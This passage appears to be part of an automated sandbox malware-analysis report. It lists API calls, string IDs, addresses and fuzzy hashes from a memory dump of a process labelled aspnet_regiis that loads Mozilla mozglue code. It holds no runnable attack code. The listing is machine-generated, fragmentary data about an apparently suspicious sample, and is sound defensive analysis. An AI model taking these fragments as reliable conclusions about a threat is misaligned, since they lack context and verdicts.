                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 956590011-0
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DC60
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC7D38A,?), ref: 6CC7DC6F
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6CC7D38A,?), ref: 6CC7DCC1
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC7D38A,?), ref: 6CC7DCE9
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC7D38A,?), ref: 6CC7DD05
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC7D38A,?), ref: 6CC7DD4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1842996449-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5FA80: GetCurrentThreadId.KERNEL32 ref: 6CC5FA8D
                                                                                                                              • Part of subcall function 6CC5FA80: AcquireSRWLockExclusive.KERNEL32(6CCAF448), ref: 6CC5FA99
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC66727
                                                                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC667C8
                                                                                                                              • Part of subcall function 6CC74290: memcpy.VCRUNTIME140(?,?,6CC82003,6CC80AD9,?,6CC80AD9,00000000,?,6CC80AD9,?,00000004,?,6CC81A62,?,6CC82003,?), ref: 6CC742C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                            • String ID: data
                                                                                                                            • API String ID: 511789754-2918445923
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC2EB57,?,?,?,?,?,?,?,?,?), ref: 6CC5D652
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC2EB57,?), ref: 6CC5D660
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC2EB57,?), ref: 6CC5D673
                                                                                                                            • free.MOZGLUE(?), ref: 6CC5D888
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memsetmoz_xmalloc
                                                                                                                            • String ID: |Enabled
                                                                                                                            • API String ID: 4142949111-2633303760
                                                                                                                            APIs
                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC5F480
                                                                                                                              • Part of subcall function 6CC2F100: LoadLibraryW.KERNEL32(shell32,?,6CC9D020), ref: 6CC2F122
                                                                                                                              • Part of subcall function 6CC2F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC2F132
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC5F555
                                                                                                                              • Part of subcall function 6CC314B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC31248,6CC31248,?), ref: 6CC314C9
                                                                                                                              • Part of subcall function 6CC314B0: memcpy.VCRUNTIME140(?,6CC31248,00000000,?,6CC31248,?), ref: 6CC314EF
                                                                                                                              • Part of subcall function 6CC2EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC2EEE3
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC5F4FD
                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC5F523
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                            • String ID: \oleacc.dll
                                                                                                                            • API String ID: 2595878907-3839883404
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6CC87526
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC87566
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC87597
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                            • API String ID: 3217676052-1401603581
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF770,-00000001,?,6CC9E330,?,6CC4BDF7), ref: 6CC8A7AF
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC4BDF7), ref: 6CC8A7C2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000018,?,6CC4BDF7), ref: 6CC8A7E4
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF770), ref: 6CC8A80A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                            • String ID: accelerator.dll
                                                                                                                            • API String ID: 2442272132-2426294810
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC8C0E9), ref: 6CC8C418
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC8C437
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC8C0E9), ref: 6CC8C44C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                            • API String ID: 145871493-2623246514
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC8748B,?), ref: 6CC875B8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC875D7
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC8748B,?), ref: 6CC875EC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                            • API String ID: 145871493-3641475894
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC87592), ref: 6CC87608
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC87627
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC87592), ref: 6CC8763C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 145871493-1050664331
                                                                                                                            • Opcode ID: 51575e913f76a0b460c9ca1b00fdde23e866954d9f61151429b1deffb16ef1b3
                                                                                                                            • Instruction ID: 0b084d2e7f2f4ccae42b9cd4d15dddf4c12a63b153d33cc4d9560a215ea09465
                                                                                                                            • Opcode Fuzzy Hash: 51575e913f76a0b460c9ca1b00fdde23e866954d9f61151429b1deffb16ef1b3
                                                                                                                            • Instruction Fuzzy Hash: C1E092B0601306AFDF006BE6A81C71ABEB8E71A399F008115E905D3740FBB084119B14
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,?,6CC8BE49), ref: 6CC8BEC4
                                                                                                                            • RtlCaptureStackBackTrace.NTDLL ref: 6CC8BEDE
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC8BE49), ref: 6CC8BF38
                                                                                                                            • RtlReAllocateHeap.NTDLL ref: 6CC8BF83
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC8BFA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2764315370-0
                                                                                                                            • Opcode ID: feac1ccb0a69278124715e75cb0fa16a8fd6617d76861e08149b39642eb05c51
                                                                                                                            • Instruction ID: 7501ed4f779521e9dbdd306eb97ee8f5daf94975cc6043339959dddea3638456
                                                                                                                            • Opcode Fuzzy Hash: feac1ccb0a69278124715e75cb0fa16a8fd6617d76861e08149b39642eb05c51
                                                                                                                            • Instruction Fuzzy Hash: 8D519175A012058FE710CF69CD90BABBBA2FF84318F294639D515A7B95E730F906CB80
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78E6E
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78EBF
                                                                                                                            • free.MOZGLUE(?,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F24
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78F46
                                                                                                                            • free.MOZGLUE(?,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F7A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: d12e2490d9321b9978c94d0b62e9a89bd07d6cee76732c6604dc29d2c3a595f3
                                                                                                                            • Instruction ID: e424b40342d177f1f09f2096ef442c3c56d839177d025ad6827b04c618230ceb
                                                                                                                            • Opcode Fuzzy Hash: d12e2490d9321b9978c94d0b62e9a89bd07d6cee76732c6604dc29d2c3a595f3
                                                                                                                            • Instruction Fuzzy Hash: E75180B5A012168FEB24CF58D880B6E73B2FB45318F15452AD616BB740F731F905CBA1
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7284D
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7289A
                                                                                                                            • free.MOZGLUE(?,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC728F1
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC72910
                                                                                                                            • free.MOZGLUE(00000001,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7293C
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7294E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 1b27efe8af8581755195061e59b8499719da07b92de26bbf0e623092cd96ca0c
                                                                                                                            • Instruction ID: a0e08c1253e1860f5e97b415e0a6bab5bbaf2b01142ab3bd2b41f1b0e6bf167b
                                                                                                                            • Opcode Fuzzy Hash: 1b27efe8af8581755195061e59b8499719da07b92de26bbf0e623092cd96ca0c
                                                                                                                            • Instruction Fuzzy Hash: 76417FB1A00206CFEB24CF68D89876A77F6EB45308F294939D556EB740F732E905CB61
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC2D06C
                                                                                                                            • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC2D139
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            • API String ID: 1090480015-2608361144
                                                                                                                            • Opcode ID: 0576ac87ce2dee9607822235bace84e4527e5f95db1d58f43425e106140b7086
                                                                                                                            • Instruction ID: db0239b35a8789a704837528a6682035be44be6cea4fd21582d9214412881534
                                                                                                                            • Opcode Fuzzy Hash: 0576ac87ce2dee9607822235bace84e4527e5f95db1d58f43425e106140b7086
                                                                                                                            • Instruction Fuzzy Hash: 0941AD72B0122A4FDB048EBC9C987AE76B0EF59714F24023DE919E7784E7A59C118BC4
                                                                                                                            APIs
                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC24EE9
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC24F02
                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC24F1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 713647276-0
                                                                                                                            • Opcode ID: 5418d749d536f45e4b153e70f3bfb86b0d5c6556b8ad5b2bb2762b66d28ea5e4
                                                                                                                            • Instruction ID: 5dd800d60b0473e5b0bb75565f95f740ceac243d3226a60ca546e54c3ce143b3
                                                                                                                            • Opcode Fuzzy Hash: 5418d749d536f45e4b153e70f3bfb86b0d5c6556b8ad5b2bb2762b66d28ea5e4
                                                                                                                            • Instruction Fuzzy Hash: B041DD716087019FC711CF29C88095BFBE4BF89354F108A2DF86A87B41EB38E918CB91
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC3159C
                                                                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC315BC
                                                                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC315E7
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC31606
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC31637
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 733145618-0
                                                                                                                            • Opcode ID: bbacfb09bdb8bbbd2f6b64136411cb2b9602f257a05e41ac5ae97e7f8a19d6ff
                                                                                                                            • Instruction ID: d8453eb037ebf40330b23a1f610d6c2f1e191cf9b6e966ddbd9851067310c5c5
                                                                                                                            • Opcode Fuzzy Hash: bbacfb09bdb8bbbd2f6b64136411cb2b9602f257a05e41ac5ae97e7f8a19d6ff
                                                                                                                            • Instruction Fuzzy Hash: 1631C772A005248FC7148F6DE8504AE76B9FB853747241B2DE42BDBBD4FB30D90587A1
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AD9D
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8ADAC
                                                                                                                            • free.MOZGLUE(?,?,?,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE01
                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE1D
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE3D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
